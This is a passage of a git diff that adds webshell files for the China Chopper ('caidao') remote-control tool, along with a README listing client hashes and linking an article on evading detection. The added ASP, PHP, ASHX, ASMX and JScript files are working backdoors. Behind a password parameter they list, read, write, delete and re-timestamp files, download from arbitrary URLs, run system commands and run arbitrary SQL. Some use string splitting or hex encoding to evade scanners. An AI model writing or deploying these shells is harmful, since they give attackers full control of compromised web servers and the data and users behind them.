+                            ER = e.StandardError;
+                            e.Close();
+                            R = OT.ReadToEnd() + ER.ReadToEnd();
+                            break;
+                        }
+                    case "N":
+                        {
+                            String strDat = Z1.ToUpper();
+                            SqlConnection Conn = new SqlConnection(Z1);
+                            Conn.Open();
+                            R = Conn.Database + "\t";
+                            Conn.Close();
+                            break;
+                        }
+                    case "O":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strConn = x[0], strDb = x[1];
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            DataTable dt = Conn.GetSchema("Columns");
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0}\t", dt.Rows[i][2].ToString());
+                            }
+                            break;
+                        }
+                    case "P":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
+                            String strConn = x[0], strDb = x[1], strTable = x[2];
+                            p[0] = strDb;
+                            p[2] = strTable;
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            DataTable dt = Conn.GetSchema("Columns", p);
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
+                            }
+                            break;
+                        }
+                    case "Q":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strDat, strConn = x[0], strDb = x[1];
+                            int i, c;
+                            strDat = Z2.ToUpper();
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
+                            {
+                                SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
+                                DataSet ds = new DataSet();
+                                OD.Fill(ds);
+                                if (ds.Tables.Count > 0)
+                                {
+                                    DataRowCollection rows = ds.Tables[0].Rows;
+                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                    {
+                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
+                                    }
+                                    R += "\r\n";
+                                    for (i = 0; i < rows.Count; i++)
+                                    {
+                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                        {
+                                            R += String.Format("{0}\t|\t", rows[i][c].ToString());
+                                        }
+                                        R += "\r\n";
+                                    }
+                                }
+                                ds.Clear();
+                                ds.Dispose();
+                            }
+                            else
+                            {
+                                SqlCommand cm = Conn.CreateCommand();
+                                cm.CommandText = Z2;
+                                cm.ExecuteNonQuery();
+                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
+                            }
+                            Conn.Close();
+                            break;
+                        }
+                    default: goto End;
+                }
+            }
+            catch (Exception E)
+            {
+                R = "ERROR:// " + E.Message;
+            }
+            result += "\x2D\x3E\x7C" + R + "\x7C\x3C\x2D";
+        End: ;
+        }
+        return result;
+    }
+    public void CP(String S, String D)
+    {
+        if (Directory.Exists(S))
+        {
+            DirectoryInfo m = new DirectoryInfo(S);
+            Directory.CreateDirectory(D);
+            foreach (FileInfo F in m.GetFiles())
+            {
+                File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+            foreach (DirectoryInfo F in m.GetDirectories())
+            {
+                CP(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+        }
+        else
+        {
+            File.Copy(S, D);
+        }
+    }
+}

caidao-shell/README.md

@@ -2,8 +2,22 @@
 
 需要菜刀原程序的请自行百度 or google
 
-还有一点就是  菜刀最后的版本是caidao-20111116  
+还有一点就是  菜刀最后的版本是
 
++ 20160622 
++ caidao.exe
++ 文件大小：581632 字节
++ 修改时间：2016年6月22日 21:06:54
++ MD5     ：ACAF6564637BA97F73297B0096C2994C
++ SHA1    ：4CD536659978003A528A356D36E2E75D1EEA6723
++ CRC32   ：96FCA3EA
++ [官网](http://www.maicaidao.com/)
+```
+    20141213 => 4b4a956b9c7dc734f339fa05e4c2a990(主程序)
+
+
+    caidao-20111116  
     zip压缩包的md5: 04A4980C9E86B5BA267F8E55CEAC2119
-
+    主程序的md5:    5001ef50c7e869253a7c152a638eab8a
+```
 "一句话"的艺术——简单的编码和变形绕过检测 url: http://drops.wooyun.org/tips/839

caidao-shell/a.asp

@@ -0,0 +1,7 @@
+<% 
+dim x1,x2 
+x1 = request("h") 
+x2 = x1 
+eval x2 
+%> 
+<!-- yes++ -->

caidao-shell/bypass01.php

@@ -0,0 +1,13 @@
+<?php
+$s0="e";
+$s1="val($";
+$s2="_";
+$s3="P";
+$s4="O";
+$s5="ST";
+
+
+$poos=$s0.$s1.$s2.$s3.$s4.$s5."[mima]);";
+$pp=@eval($poos);
+@eval($pp);
+?>

caidao-shell/customize.ashx

@@ -0,0 +1,304 @@
+<%@ WebHandler Language="C#" Class="Handler" %> 
+
+using System; 
+using System.Web; 
+using System.IO; 
+using System.Net; 
+using System.Text; 
+using System.Data; 
+using System.Data.SqlClient; 
+using System.Diagnostics; 
+
+public class Handler : IHttpHandler 
+{ 
+    public void ProcessRequest(HttpContext context) 
+    { 
+        String Z = context.Request.Form["z"];//设置密码z 
+        if (Z != "") 
+        { 
+            String Z1 = context.Request.Form["Z1"]; 
+            String Z2 = context.Request.Form["Z2"]; 
+            String R = ""; 
+            try 
+            { 
+                switch (Z) 
+                { 
+                    case "A": 
+                        { 
+                            String[] c = Directory.GetLogicalDrives(); 
+                            R = String.Format("{0}\t", context.Server.MapPath("/")); 
+                            for (int i = 0; i < c.Length; i++) 
+                                R += c[i][0] + ":"; 
+                            break; 
+                        } 
+                    case "B": 
+                        { 
+                            DirectoryInfo m = new DirectoryInfo(Z1); 
+                            foreach (DirectoryInfo D in m.GetDirectories()) 
+                            { 
+                                R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); 
+                            } 
+                            foreach (FileInfo D in m.GetFiles()) 
+                            { 
+                                R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); 
+                            } 
+                            break; 
+                        } 
+                    case "C": 
+                        { 
+                            StreamReader m = new StreamReader(Z1, Encoding.Default); 
+                            R = m.ReadToEnd(); 
+                            m.Close(); 
+                            break; 
+                        } 
+                    case "D": 
+                        { 
+                            StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
+                            m.Write(Z2); 
+                            R = "1"; 
+                            m.Close(); 
+                            break; 
+                        } 
+                    case "E": 
+                        { 
+                            if (Directory.Exists(Z1)) 
+                            { 
+                                Directory.Delete(Z1, true); 
+                            } 
+                            else 
+                            { 
+                                File.Delete(Z1); 
+                            } 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "F": 
+                        { 
+                            context.Response.Clear(); 
+                            context.Response.Write("\x2D\x3E\x7C"); 
+                            context.Response.WriteFile(Z1); 
+                            context.Response.Write("\x7C\x3C\x2D"); 
+                            goto End; 
+                        } 
+                    case "G": 
+                        { 
+                            byte[] B = new byte[Z2.Length / 2]; 
+                            for (int i = 0; i < Z2.Length; i += 2) 
+                            { 
+                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); 
+                            } 
+                            FileStream fs = new FileStream(Z1, FileMode.Create); 
+                            fs.Write(B, 0, B.Length); 
+                            fs.Close(); 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "H": 
+                        { 
+                            CP(Z1, Z2, context); 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "I": 
+                        { 
+                            if (Directory.Exists(Z1)) 
+                            { 
+                                Directory.Move(Z1, Z2); 
+                            } 
+                            else 
+                            { 
+                                File.Move(Z1, Z2); 
+                            } 
+                            break; 
+                        } 
+                    case "J": 
+                        { 
+                            Directory.CreateDirectory(Z1); 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "K": 
+                        { 
+                            DateTime TM = Convert.ToDateTime(Z2); 
+                            if (Directory.Exists(Z1)) 
+                            { 
+                                Directory.SetCreationTime(Z1, TM); 
+                                Directory.SetLastWriteTime(Z1, TM); 
+                                Directory.SetLastAccessTime(Z1, TM); 
+                            } 
+                            else 
+                            { 
+                                File.SetCreationTime(Z1, TM); 
+                                File.SetLastWriteTime(Z1, TM); 
+                                File.SetLastAccessTime(Z1, TM); 
+                            } 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "L": 
+                        { 
+                            HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); 
+                            RQ.Method = "GET"; 
+                            RQ.ContentType = "application/x-www-form-urlencoded"; 
+                            HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); 
+                            Stream WF = WB.GetResponseStream(); 
+                            FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); 
+                            int i; 
+                            byte[] buffer = new byte[1024]; 
+                            while (true) 
+                            { 
+                                i = WF.Read(buffer, 0, buffer.Length); 
+                                if (i < 1) 
+                                { 
+                                    break; 
+                                } 
+                                FS.Write(buffer, 0, i); 
+                            } 
+                            WF.Close(); 
+                            WB.Close(); 
+                            FS.Close(); 
+                            R = "1"; 
+                            break; 
+                        } 
+                    case "M": 
+                        { 
+                            ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); 
+                            Process e = new Process(); 
+                            StreamReader OT, ER; 
+                            c.UseShellExecute = false; 
+                            c.RedirectStandardOutput = true; 
+                            c.RedirectStandardError = true; 
+                            e.StartInfo = c; 
+                            c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
+                            e.Start(); 
+                            OT = e.StandardOutput; 
+                            ER = e.StandardError; 
+                            e.Close(); 
+                            R = OT.ReadToEnd() + ER.ReadToEnd(); 
+                            break; 
+                        } 
+                    case "N": 
+                        { 
+                            String strDat = Z1.ToUpper(); 
+                            SqlConnection Conn = new SqlConnection(Z1); 
+                            Conn.Open(); 
+                            R = Conn.Database + "\t"; 
+                            Conn.Close(); 
+                            break; 
+                        } 
+                    case "O": 
+                        { 
+                            String[] x = Z1.Replace("\r", "").Split('\n'); 
+                            String strConn = x[0], strDb = x[1]; 
+                            SqlConnection Conn = new SqlConnection(strConn); 
+                            Conn.Open(); 
+                            DataTable dt = Conn.GetSchema("Columns"); 
+                            Conn.Close(); 
+                            for (int i = 0; i < dt.Rows.Count; i++) 
+                            { 
+                                R += String.Format("{0}\t", dt.Rows[i][2].ToString()); 
+                            } 
+                            break; 
+                        } 
+                    case "P": 
+                        { 
+                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; 
+                            String strConn = x[0], strDb = x[1], strTable = x[2]; 
+                            p[0] = strDb; 
+                            p[2] = strTable; 
+                            SqlConnection Conn = new SqlConnection(strConn); 
+                            Conn.Open(); 
+                            DataTable dt = Conn.GetSchema("Columns", p); 
+                            Conn.Close(); 
+                            for (int i = 0; i < dt.Rows.Count; i++) 
+                            { 
+                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); 
+                            } 
+                            break; 
+                        } 
+                    case "Q": 
+                        { 
+                            String[] x = Z1.Replace("\r", "").Split('\n'); 
+                            String strDat, strConn = x[0], strDb = x[1]; 
+                            int i, c; 
+                            strDat = Z2.ToUpper(); 
+                            SqlConnection Conn = new SqlConnection(strConn); 
+                            Conn.Open(); 
+                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) 
+                            { 
+                                SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); 
+                                DataSet ds = new DataSet(); 
+                                OD.Fill(ds); 
+                                if (ds.Tables.Count > 0) 
+                                { 
+                                    DataRowCollection rows = ds.Tables[0].Rows; 
+                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
+                                    { 
+                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); 
+                                    } 
+                                    R += "\r\n"; 
+                                    for (i = 0; i < rows.Count; i++) 
+                                    { 
+                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
+                                        { 
+                                            R += String.Format("{0}\t|\t", rows[i][c].ToString()); 
+                                        } 
+                                        R += "\r\n"; 
+                                    } 
+                                } 
+                                ds.Clear(); 
+                                ds.Dispose(); 
+                            } 
+                            else 
+                            { 
+                                SqlCommand cm = Conn.CreateCommand(); 
+                                cm.CommandText = Z2; 
+                                cm.ExecuteNonQuery(); 
+                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; 
+                            } 
+                            Conn.Close(); 
+                            break; 
+                        } 
+                    default: goto End; 
+                } 
+            } 
+            catch(Exception E) 
+          { 
+            R="ERROR:// "+E.Message; 
+          } 
+          context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); 
+          End:; 
+        } 
+    } 
+
+     
+    public bool IsReusable 
+    { 
+        get 
+        { 
+            return false; 
+        } 
+
+    } 
+
+    public void CP(String S,String D,HttpContext context) 
+    { 
+      if(Directory.Exists(S)) 
+        { 
+          DirectoryInfo m=new DirectoryInfo(S); 
+          Directory.CreateDirectory(D); 
+          foreach(FileInfo F in m.GetFiles()) 
+          { 
+            File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); 
+          } 
+          foreach(DirectoryInfo F in m.GetDirectories()) 
+          { 
+                    CP(S + "\\" + F.Name, D + "\\" + F.Name, context); 
+          } 
+        } 
+      else 
+      { 
+        File.Copy(S,D); 
+      } 
+    } 
+}

caidao-shell/customize.asmx

@@ -0,0 +1,320 @@
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+public class Service : System.Web.Services.WebService
+{
+    public Service()
+    {
+
+        //如果使用设计的组件，请取消注释以下行
+        //InitializeComponent(); 
+    }
+
+    [WebMethod]
+    public string Chopper() {
+        String Z = HttpContext.Current.Request.Form["z"];//设置密码
+        if (Z != "")
+        {
+            String Z1 = HttpContext.Current.Request.Form["Z1"];
+            String Z2 = HttpContext.Current.Request.Form["Z2"];
+            String R = "";
+            try
+            {
+                switch (Z)
+                {
+                    case "A":
+                        {
+                            String[] c = Directory.GetLogicalDrives();
+                            R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/"));
+                            for (int i = 0; i < c.Length; i++)
+                                R += c[i][0] + ":";
+                            break;
+                        }
+                    case "B":
+                        {
+                            DirectoryInfo m = new DirectoryInfo(Z1);
+                            foreach (DirectoryInfo D in m.GetDirectories())
+                            {
+                                R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
+                            }
+                            foreach (FileInfo D in m.GetFiles())
+                            {
+                                R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
+                            }
+                            break;
+                        }
+                    case "C":
+                        {
+                            StreamReader m = new StreamReader(Z1, Encoding.Default);
+                            R = m.ReadToEnd();
+                            m.Close();
+                            break;
+                        }
+                    case "D":
+                        {
+                            StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
+                            m.Write(Z2);
+                            R = "1";
+                            m.Close();
+                            break;
+                        }
+                    case "E":
+                        {
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.Delete(Z1, true);
+                            }
+                            else
+                            {
+                                File.Delete(Z1);
+                            }
+                            R = "1";
+                            break;
+                        }
+                    case "F":
+                        {
+                            HttpContext.Current.Response.Clear();
+                            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
+                            HttpContext.Current.Response.Write("<data>");
+                            HttpContext.Current.Response.Write("<![CDATA[");
+                            HttpContext.Current.Response.Write("\x2D\x3E\x7C");
+                            HttpContext.Current.Response.WriteFile(Z1);
+                            HttpContext.Current.Response.Write("\x7C\x3C\x2D");
+                            HttpContext.Current.Response.Write("]]>");
+                            HttpContext.Current.Response.Write("</data>");
+                            HttpContext.Current.Response.End();
+                            goto End;
+                        }
+                    case "G":
+                        {
+                            byte[] B = new byte[Z2.Length / 2];
+                            for (int i = 0; i < Z2.Length; i += 2)
+                            {
+                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
+                            }
+                            FileStream fs = new FileStream(Z1, FileMode.Create);
+                            fs.Write(B, 0, B.Length);
+                            fs.Close();
+                            R = "1";
+                            break;
+                        }
+                    case "H":
+                        {
+                            CP(Z1, Z2);
+                            R = "1";
+                            break;
+                        }
+                    case "I":
+                        {
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.Move(Z1, Z2);
+                            }
+                            else
+                            {
+                                File.Move(Z1, Z2);
+                            }
+                            break;
+                        }
+                    case "J":
+                        {
+                            Directory.CreateDirectory(Z1);
+                            R = "1";
+                            break;
+                        }
+                    case "K":
+                        {
+                            DateTime TM = Convert.ToDateTime(Z2);
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.SetCreationTime(Z1, TM);
+                                Directory.SetLastWriteTime(Z1, TM);
+                                Directory.SetLastAccessTime(Z1, TM);
+                            }
+                            else
+                            {
+                                File.SetCreationTime(Z1, TM);
+                                File.SetLastWriteTime(Z1, TM);
+                                File.SetLastAccessTime(Z1, TM);
+                            }
+                            R = "1";
+                            break;
+                        }
+                    case "L":
+                        {
+                            HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
+                            RQ.Method = "GET";
+                            RQ.ContentType = "application/x-www-form-urlencoded";
+                            HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
+                            Stream WF = WB.GetResponseStream();
+                            FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
+                            int i;
+                            byte[] buffer = new byte[1024];
+                            while (true)
+                            {
+                                i = WF.Read(buffer, 0, buffer.Length);
+                                if (i < 1)
+                                {
+                                    break;
+                                }
+                                FS.Write(buffer, 0, i);
+                            }
+                            WF.Close();
+                            WB.Close();
+                            FS.Close();
+                            R = "1";
+                            break;
+                        }
+                    case "M":
+                        {
+                            ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));
+                            Process e = new Process();
+                            StreamReader OT, ER;
+                            c.UseShellExecute = false;
+                            c.RedirectStandardOutput = true;
+                            c.RedirectStandardError = true;
+                            e.StartInfo = c;
+                            c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
+                            e.Start();
+                            OT = e.StandardOutput;
+                            ER = e.StandardError;
+                            e.Close();
+                            R = OT.ReadToEnd() + ER.ReadToEnd();
+                            break;
+                        }
+                    case "N":
+                        {
+                            String strDat = Z1.ToUpper();
+                            SqlConnection Conn = new SqlConnection(Z1);
+                            Conn.Open();
+                            R = Conn.Database + "\t";
+                            Conn.Close();
+                            break;
+                        }
+                    case "O":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strConn = x[0], strDb = x[1];
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            DataTable dt = Conn.GetSchema("Columns");
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0}\t", dt.Rows[i][2].ToString());
+                            }
+                            break;
+                        }
+                    case "P":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
+                            String strConn = x[0], strDb = x[1], strTable = x[2];
+                            p[0] = strDb;
+                            p[2] = strTable;
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            DataTable dt = Conn.GetSchema("Columns", p);
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
+                            }
+                            break;
+                        }
+                    case "Q":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strDat, strConn = x[0], strDb = x[1];
+                            int i, c;
+                            strDat = Z2.ToUpper();
+                            SqlConnection Conn = new SqlConnection(strConn);
+                            Conn.Open();
+                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
+                            {
+                                SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
+                                DataSet ds = new DataSet();
+                                OD.Fill(ds);
+                                if (ds.Tables.Count > 0)
+                                {
+                                    DataRowCollection rows = ds.Tables[0].Rows;
+                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                    {
+                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
+                                    }
+                                    R += "\r\n";
+                                    for (i = 0; i < rows.Count; i++)
+                                    {
+                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                        {
+                                            R += String.Format("{0}\t|\t", rows[i][c].ToString());
+                                        }
+                                        R += "\r\n";
+                                    }
+                                }
+                                ds.Clear();
+                                ds.Dispose();
+                            }
+                            else
+                            {
+                                SqlCommand cm = Conn.CreateCommand();
+                                cm.CommandText = Z2;
+                                cm.ExecuteNonQuery();
+                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
+                            }
+                            Conn.Close();
+                            break;
+                        }
+                    default: goto End;
+                }
+            }
+            catch (Exception E)
+            {
+                R = "ERROR:// " + E.Message;
+            }
+            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
+            HttpContext.Current.Response.Write("<data>");
+            HttpContext.Current.Response.Write("<![CDATA[");
+            HttpContext.Current.Response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");
+            HttpContext.Current.Response.Write("]]>");
+            HttpContext.Current.Response.Write("</data>");
+            HttpContext.Current.Response.End();
+        End: ;
+        }
+        return "";
+    }
+    public void CP(String S, String D)
+    {
+        if (Directory.Exists(S))
+        {
+            DirectoryInfo m = new DirectoryInfo(S);
+            Directory.CreateDirectory(D);
+            foreach (FileInfo F in m.GetFiles())
+            {
+                File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+            foreach (DirectoryInfo F in m.GetDirectories())
+            {
+                CP(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+        }
+        else
+        {
+            File.Copy(S, D);
+        }
+    }
+}

caidao-shell/cutstomize.asp

@@ -0,0 +1,31 @@
+<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>
+var Sp = String(Request.form('z'));
+var Fla = {'E':eval};
+var St=""
+var A="H74H72H79H7BH76H61H72H20H53H3DH22H2DH3EH7CH22H2BH53H65H72H76H65H72H2EH4DH61H70H70H61H74H68H28H22H2FH22H29H2BH22H5CH74H22H3BH76H61H72H20H6FH46H73H6FH20H3DH20H53H65H72H76H65H72H2EH43H72H65H61H74H65H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH76H61H72H20H6FH44H72H69H76H65H72H73H20H3DH20H6FH46H73H6FH2EH44H72H69H76H65H73H3BH66H6FH72H28H76H61H72H20H78H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H6FH44H72H69H76H65H72H73H29H3BH21H78H2EH61H74H45H6EH64H28H29H3BH78H2EH6DH6FH76H65H4EH65H78H74H28H29H29H20H7BH76H61H72H20H6FH44H72H69H76H65H72H20H3DH20H78H2EH69H74H65H6DH28H29H3BH53H2BH3DH6FH44H72H69H76H65H72H2EH50H61H74H68H3BH7DH53H2BH3DH22H7CH3CH2DH22H3BH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H29H3BH7DH63H61H74H63H68H28H65H29H7BH7D";
+var B="H76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H62H29H7BH0AH76H61H72H20H63H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH53H75H62H46H6FH6CH64H65H72H73H29H3BH0AH66H6FH72H20H28H3BH21H63H2EH61H74H45H6EH64H28H29H3BH63H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H6FH28H63H2EH69H74H65H6DH28H29H29H3BH0AH76H61H72H20H66H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH66H69H6CH65H73H29H3BH0AH66H6FH72H20H28H3BH21H66H2EH61H74H45H6EH64H28H29H3BH66H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H69H28H66H2EH69H74H65H6DH28H29H29H0AH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H6FH28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH2FH5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H30H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H69H28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H22H2BH66H2EH73H69H7AH65H2BH22H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH76H61H72H20H53H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H2BH22H7CH3CH2DH22H29H3B";
+var C="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH4FH70H65H6EH54H65H78H74H66H69H6CH65H28H66H2CH31H2CH30H29H3BH0AH78H69H65H3DH78H69H65H2BH66H2EH52H65H61H64H41H6CH6CH28H29H2BH22H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu8BFBHu53D6Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B";
+var D="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH43H72H65H61H74H65H54H65H78H74H46H69H6CH65H28H66H2CH31H29H3BH0AH66H2EH57H72H69H74H65H28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH32H27H29H29H3BH0AH66H2EH63H6CH6FH73H65H28H29H3BH0AH78H69H65H2BH3DH22H31H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu5199Hu5165Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B";
